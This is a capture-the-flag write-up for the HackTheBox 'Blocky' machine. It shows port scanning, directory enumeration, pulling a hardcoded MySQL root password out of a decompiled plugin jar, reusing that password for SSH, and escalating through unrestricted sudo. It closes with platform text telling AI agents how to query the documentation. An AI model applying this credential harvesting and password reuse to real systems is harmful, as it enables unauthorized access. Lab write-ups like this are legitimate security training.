# Blocky ### Initial enumeration ```bash # Nmap 7.80 scan initiated Sat Sep 28 23:30:25 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,21,80,25565 10.10.10.37 Nmap scan report for 10.10.10.37 Host is up (0.23s latency). PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) |_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.8 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: BlockyCraft – Under Construction! 25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%), Linux 4.8 (92%), Linux 3.16 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 240.30 ms 10.10.14.1 2 240.22 ms 10.10.10.37 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Sep 28 23:30:49 2019 -- 1 IP address (1 host up) scanned in 25.06 seconds ``` Web-server on port 80 with default Wordpress installation running, nothing interesting, ran `gobuster`. ```bash /wiki (Status: 301) /wp-content (Status: 301) /index.php (Status: 301) /wp-login.php (Status: 200) /plugins (Status: 301) /license.txt (Status: 200) /wp-includes (Status: 301) /javascript (Status: 301) /wp-trackback.php (Status: 200) /wp-admin (Status: 301) /phpmyadmin (Status: 301) /wp-signup.php (Status: 302) /server-status (Status: 403) ``` `/wiki and /plugins` seemed interesting. Wiki had nothing but a note, however `/plugins` had 2 jar files. ![](/files/-Lq1FRAtbCaQEs9-drsW) `BlockyCore.jar` seemed interesting so I planned on getting the contents out of the files. ```bash $ unzip BlockyCore.jar -d output $ ls -laR ./output .: total 16 drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 . drwxr-xr-x 5 jtnydv jtnydv 4096 Sep 30 18:31 .. drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 com drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 META-INF ./com: total 12 drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 . drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 .. drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 myfirstplugin ./com/myfirstplugin: total 12 drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 . drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 .. -rw-r--r-- 1 jtnydv jtnydv 939 Jul 2 2017 BlockyCore.class ./META-INF: total 12 drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 . drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 .. -rw-r--r-- 1 jtnydv jtnydv 25 Jul 2 2017 MANIFEST.MF ``` BlockyCore.class seemed like the only interesting file in the folders, so I went ahead and decompiled it to something readable. ```bash $ javap -c BlockyCore.class --- SNIP --- ublic com.myfirstplugin.BlockyCore(); Code: 0: aload_0 1: invokespecial #12 // Method java/lang/Object."":()V 4: aload_0 5: ldc #14 // String localhost 7: putfield #16 // Field sqlHost:Ljava/lang/String; 10: aload_0 11: ldc #18 // String root 13: putfield #20 // Field sqlUser:Ljava/lang/String; 16: aload_0 17: ldc #22 // String 8YsqfCTnvxAUeduzjNSXe22 19: putfield #24 // Field sqlPass:Ljava/lang/String; 22: return --- SNIP --- ``` We got credentials for the `mysql` server `root:8YsqfCTnvxAUeduzjNSXe22`. These credentials did get me into the `phpmyadmin` interface of the server and help me fetch username `notch` from the `wp_users` list. ![](/files/-Lq1GfNzRnpOeuiDiZYR) I tried cracking the password the user, however it was not part of the `rockyou.txt wordlist` so I let it be and continued with the username and passwords I had, to `bruteforce` my way into the SSH server. ```bash $ ssh root@10.10.10.37 root@10.10.10.37's password: Permission denied, please try again. root@10.10.10.37's password: # Password combination didn't work for root, however it did # work for notch $ ssh notch@10.10.10.37 notch@10.10.10.37's password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 7 packages can be updated. 7 updates are security updates. Last login: Mon Sep 30 07:40:07 2019 from 10.10.14.10 notch@Blocky:~$ id uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) notch@Blocky:~$ ``` ### User own ```bash notch@Blocky:~$ cat /home/notch/user.txt; echo 59fee*** notch@Blocky:~$ ``` ### Root own I noticed that we had the password for the account as well as we were part of the `sudo` group so I went ahead and checked the permissions we had in `sudoers`. ```bash notch@Blocky:~$ sudo -l Matching Defaults entries for notch on Blocky: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User notch may run the following commands on Blocky: (ALL : ALL) ALL ``` So we are essentially root, we can run ALL commands, as ALL users, on ALL hosts. This is game over. ```bash notch@Blocky:~$ sudo cat /root/root.txt; echo 0a969*** notch@Blocky:~$ ``` ### Learning outcome Dense enumeration is the key while exploiting machines, I had nearly missed the trying the user notch with the password of root. Keeping a track of usernames and passwords is important while pen-testing. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jtnydv.gitbook.io/wiki/write-ups/hackthebox/linux/blocky.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.